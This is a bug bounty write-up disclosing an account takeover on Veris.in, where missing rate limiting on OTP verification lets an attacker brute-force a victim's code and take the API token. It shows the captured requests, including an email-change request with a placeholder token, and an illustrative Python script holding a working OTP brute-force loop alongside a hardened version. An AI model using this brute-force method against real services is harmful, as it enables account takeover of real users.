Veris.in Account Takeover

Hey guys! Today I'll share my account takeover finding on Veris.in, so let's not waste time and get started.



I installed the Android app of Veris and started testing it. In the Veris app you first have to verify your phone number, and only then can you register. While doing this I captured the verification request and tried to brute-force the OTP, and I noticed that there was no rate limiting, so I could attach anyone's number to my own account. I reported it, but that was not a big deal. Then I kept testing, and after a lot of poking around I noticed that every request has this structure:

POST /api/v1/*Any Functionality*/ HTTP/1.1
Authorization: token b910cxxx2ac02f3a8xxxxxxxxxxxxxxxxxxxxxxx
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1; )
Host: live.veris.in
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 26

What I noticed is that there is no user session as such; everything works on a token (in the Authorization header), which is what authorizes the client to the Veris API. Then I wondered where that token came from, since I had never entered a password. And then it clicked: I had entered a One Time Password.

So what happens here is this: when we enter a number, the server sends an OTP to it; after OTP verification it generates a token that authenticates us to the API, and checks whether the number matches any account in the database; if it does, we are logged in to that account. As I mentioned earlier, there is no rate limit on OTP verification. So I can trigger an OTP for your number, brute-force the OTP to obtain a token for it, and boom, I can use that token to modify the info of your account, for example:

POST /api/v1/change_email/ HTTP/1.1
Authorization: token **BRUTEFORCED TOKEN GOES HERE**
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1; )
Host: live.veris.in
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 27

{"email":"hacker@hack.com"}

If the number is NOT registered, the response still contains a freshly generated token (screenshot in the original post).

If the number IS registered, the response contains a token as well, and that token is now bound to the existing account (screenshot in the original post).
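As an added illustration, not code from the post or from Veris, the script below models the login flow just described: a server-side OTP service in its vulnerable shape (no cap on verification attempts) and in a hardened shape (short-lived, single-use code that is burned after a few wrong guesses), plus the attacker loop that replays the verification request once per candidate code. The class and function names, the 4-digit OTP length, the attempt cap and the TTL are assumptions; the post states none of them.

```python
import secrets
import time

# Added illustration, not Veris code. The OTP length, the attempt cap and the
# TTL are assumptions; the post does not state any of them.
OTP_DIGITS = 4
MAX_ATTEMPTS = 5
OTP_TTL_SECONDS = 300


class OtpLogin:
    """OTP login as the post describes it: a phone number requests a code, and a
    correct code yields an API token that later goes in 'Authorization: token'."""

    def __init__(self, registered_numbers, hardened, code_source=secrets.randbelow):
        self.registered = set(registered_numbers)
        self.hardened = hardened          # False reproduces the bug, True the fix
        self.code_source = code_source    # injectable so tests can fix the code
        self.pending = {}                 # phone -> [code, issued_at, failures]
        self.tokens = {}                  # token -> phone

    def request_otp(self, phone):
        code = f"{self.code_source(10 ** OTP_DIGITS):0{OTP_DIGITS}d}"
        self.pending[phone] = [code, time.time(), 0]
        return code                       # a real server would SMS this, not return it

    def verify(self, phone, code):
        """Returns (status, token); status is 'ok', 'wrong' or 'locked'."""
        entry = self.pending.get(phone)
        if entry is None:
            return "locked", None         # no live code: client must request a new one
        expected, issued_at, _failures = entry
        if self.hardened and time.time() - issued_at > OTP_TTL_SECONDS:
            del self.pending[phone]
            return "locked", None
        if not secrets.compare_digest(code, expected):
            entry[2] += 1
            if self.hardened and entry[2] >= MAX_ATTEMPTS:
                del self.pending[phone]   # burn the code after too many guesses
                return "locked", None
            return "wrong", None
        del self.pending[phone]           # a code is single-use either way
        token = secrets.token_hex(20)     # 40 hex chars, like the captured header
        self.tokens[token] = phone
        return "ok", token

    def account_for(self, token):
        """What an authenticated API call sees: the phone bound to the token and
        whether that phone already belonged to a registered account."""
        phone = self.tokens.get(token)
        if phone is None:
            return None
        return {"phone": phone, "registered": phone in self.registered}


def brute_force(service, victim_phone):
    """Attacker side: trigger an OTP to the victim's number, then replay the
    verification request once per candidate code, as the post describes."""
    service.request_otp(victim_phone)
    attempts = 0
    for guess in range(10 ** OTP_DIGITS):
        attempts += 1
        status, token = service.verify(victim_phone, f"{guess:0{OTP_DIGITS}d}")
        if status == "ok":
            return token, attempts
        if status == "locked":
            return None, attempts
    return None, attempts


if __name__ == "__main__":
    victim = "+910000000000"              # constructed sample number
    weak = OtpLogin([victim], hardened=False)
    token, tries = brute_force(weak, victim)
    print("unlimited:", weak.account_for(token), "after", tries, "guesses")
    strong = OtpLogin([victim], hardened=True)
    token, tries = brute_force(strong, victim)
    print("hardened:", token, "after", tries, "guesses")
```

Against the unlimited service the loop always ends with a token, whether or not the number belongs to an existing account, which is exactly what the two responses above show; against the hardened one it is cut off after MAX_ATTEMPTS guesses and has to trigger a new SMS, which turns a silent brute-force into something both the victim and the server notice. A per-code attempt cap should be paired with per-number and per-IP throttling on the OTP request endpoint itself, otherwise the attacker simply requests a fresh code after each lockout.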

Video Proof of Concept (embedded video in the original post)